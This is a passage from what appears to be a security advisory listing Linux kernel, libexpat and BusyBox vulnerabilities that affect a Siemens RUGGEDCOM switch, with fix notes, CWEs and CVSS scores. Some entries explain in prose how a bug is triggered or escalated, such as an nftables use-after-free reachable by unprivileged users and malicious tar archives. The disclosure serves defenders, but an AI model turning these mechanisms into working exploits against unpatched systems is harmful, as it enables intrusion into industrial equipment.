<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix inverted genmask check in nft_map_catchall_activate() nft_map_catchall_activate() has an inverted element activity check compared to its non-catchall counterpart nft_mapelem_activate() and compared to what is logically required. nft_map_catchall_activate() is called from the abort path to re-activate catchall map elements that were deactivated during a failed transaction. It should skip elements that are already active (they don't need re-activation) and process elements that are inactive (they need to be restored). Instead, the current code does the opposite: it skips inactive elements and processes active ones. Compare the non-catchall activate callback, which is correct: nft_mapelem_activate(): if (nft_set_elem_active(ext, iter-&gt;genmask)) return 0; /* skip active, process inactive */ With the buggy catchall version: nft_map_catchall_activate(): if (!nft_set_elem_active(ext, genmask)) continue; /* skip inactive, process active */ The consequence is that when a DELSET operation is aborted, nft_setelem_data_activate() is never called for the catchall element. For NFT_GOTO verdict elements, this means nft_data_hold() is never called to restore the chain-&gt;use reference count. Each abort cycle permanently decrements chain-&gt;use. Once chain-&gt;use reaches zero, DELCHAIN succeeds and frees the chain while catchall verdict elements still reference it, resulting in a use-after-free. This is exploitable for local privilege escalation from an unprivileged user via user namespaces + nftables on distributions that enable CONFIG_USER_NS and CONFIG_NF_TABLES. Fix by removing the negation so the check matches nft_mapelem_activate(): skip active elements, process inactive ones.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23111">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23112</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: nvmet-tcp: add bounds checks in nvmet_tcp_build_pdu_iovec nvmet_tcp_build_pdu_iovec() could walk past cmd-&gt;req.sg when a PDU length or offset exceeds sg_cnt and then use bogus sg-&gt;length/offset values, leading to _copy_to_iter() GPF/KASAN. Guard sg_idx, remaining entries, and sg-&gt;length/offset before building the bvec.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23112">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>9.8</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23220</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix infinite loop caused by next_smb2_rcv_hdr_off reset in error paths The problem occurs when a signed request fails smb2 signature verification check. In __process_request(), if check_sign_req() returns an error, set_smb2_rsp_status(work, STATUS_ACCESS_DENIED) is called. set_smb2_rsp_status() set work-&gt;next_smb2_rcv_hdr_off as zero. By resetting next_smb2_rcv_hdr_off to zero, the pointer to the next command in the chain is lost. Consequently, is_chained_smb2_message() continues to point to the same request header instead of advancing. If the header's NextCommand field is non-zero, the function returns true, causing __handle_ksmbd_work() to repeatedly process the same failed request in an infinite loop. This results in the kernel log being flooded with "bad smb2 signature" messages and high CPU usage. This patch fixes the issue by changing the return value from SERVER_HANDLER_CONTINUE to SERVER_HANDLER_ABORT. This ensures that the processing loop terminates immediately rather than attempting to continue from an invalidated offset.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23220">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/835.html">CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23222</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: omap - Allocate OMAP_CRYPTO_FORCE_COPY scatterlists correctly The existing allocation of scatterlists in omap_crypto_copy_sg_lists() was allocating an array of scatterlist pointers, not scatterlist objects, resulting in a 4x too small allocation. Use sizeof(*new_sg) to get the correct object size.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23222">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23228</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: smb: server: fix leak of active_num_conn in ksmbd_tcp_new_connection() On kthread_run() failure in ksmbd_tcp_new_connection(), the transport is freed via free_transport(), which does not decrement active_num_conn, leaking this counter. Replace free_transport() with ksmbd_tcp_disconnect().</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23228">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23229</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: virtio - Add spinlock protection with virtqueue notification When VM boots with one virtio-crypto PCI device and builtin backend, run openssl benchmark command with multiple processes, such as openssl speed -evp aes-128-cbc -engine afalg -seconds 10 -multi 32 openssl processes will hangup and there is error reported like this: virtio_crypto virtio0: dataq.0:id 3 is not a head! It seems that the data virtqueue need protection when it is handled for virtio done notification. If the spinlock protection is added in virtcrypto_done_task(), openssl benchmark with multiple processes works well.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23229">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/820.html">CWE-820 Missing Synchronization</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23230</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: smb: client: split cached_fid bitfields to avoid shared-byte RMW races is_open, has_lease and on_list are stored in the same bitfield byte in struct cached_fid but are updated in different code paths that may run concurrently. Bitfield assignments generate byte read–modify–write operations (e.g. `orb $mask, addr` on x86_64), so updating one flag can restore stale values of the others. A possible interleaving is: CPU1: load old byte (has_lease=1, on_list=1) CPU2: clear both flags (store 0) CPU1: RMW store (old | IS_OPEN) -&gt; reintroduces cleared bits To avoid this class of races, convert these flags to separate bool fields.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23230">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23231</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix use-after-free in nf_tables_addchain() nf_tables_addchain() publishes the chain to table-&gt;chains via list_add_tail_rcu() (in nft_chain_add()) before registering hooks. If nf_tables_register_hook() then fails, the error path calls nft_chain_del() (list_del_rcu()) followed by nf_tables_chain_destroy() with no RCU grace period in between. This creates two use-after-free conditions: 1) Control-plane: nf_tables_dump_chains() traverses table-&gt;chains under rcu_read_lock(). A concurrent dump can still be walking the chain when the error path frees it. 2) Packet path: for NFPROTO_INET, nf_register_net_hook() briefly installs the IPv4 hook before IPv6 registration fails. Packets entering nft_do_chain() via the transient IPv4 hook can still be dereferencing chain-&gt;blob_gen_X when the error path frees the chain. Add synchronize_rcu() between nft_chain_del() and the chain destroy so that all RCU readers -- both dump threads and in-flight packet evaluation -- have finished before the chain is freed.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23231">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23236</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fbdev: smscufx: properly copy ioctl memory to kernelspace The UFX_IOCTL_REPORT_DAMAGE ioctl does not properly copy data from userspace to kernelspace, and instead directly references the memory, which can cause problems if invalid data is passed from userspace. Fix this all up by correctly copying the memory before accessing it within the kernel.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23236">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23238</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: romfs: check sb_set_blocksize() return value romfs_fill_super() ignores the return value of sb_set_blocksize(), which can fail if the requested block size is incompatible with the block device's configuration. This can be triggered by setting a loop device's block size larger than PAGE_SIZE using ioctl(LOOP_SET_BLOCK_SIZE, 32768), then mounting a romfs filesystem on that device. When sb_set_blocksize(sb, ROMBSIZE) is called with ROMBSIZE=4096 but the device has logical_block_size=32768, bdev_validate_blocksize() fails because the requested size is smaller than the device's logical block size. sb_set_blocksize() returns 0 (failure), but romfs ignores this and continues mounting. The superblock's block size remains at the device's logical block size (32768). Later, when sb_bread() attempts I/O with this oversized block size, it triggers a kernel BUG in folio_set_bh(): kernel BUG at fs/buffer.c:1582! BUG_ON(size &gt; PAGE_SIZE); Fix by checking the return value of sb_set_blocksize() and failing the mount with -EINVAL if it returns 0.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23238">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-24515</a></h3>
<div class="csaf-accordion-content">
<p>In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-24515">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>2.9</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25210</a></h3>
<div class="csaf-accordion-content">
<p>In libexpat before 2.7.4, the doContent function does not properly determine the buffer size bufSize because there is no integer overflow check for tag buffer reallocation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-25210">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/190.html">CWE-190 Integer Overflow or Wraparound</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-26157</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in BusyBox. Incomplete path sanitization in its archive extraction utilities allows an attacker to craft malicious archives that when extracted, and under specific conditions, may write to files outside the intended directory. This can lead to arbitrary file overwrite, potentially enabling code execution through the modification of sensitive system files.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-26157">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/73.html">CWE-73 External Control of File Name or Path</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-26158</a></h3>
<div class="csaf-accordion-content">
<p>A flaw was found in BusyBox. This vulnerability allows an attacker to modify files outside of the intended extraction directory by crafting a malicious tar archive containing unvalidated hardlink or symlink entries. If the tar archive is extracted with elevated privileges, this flaw can lead to privilege escalation, enabling an attacker to gain unauthorized access to critical system files.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-26158">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
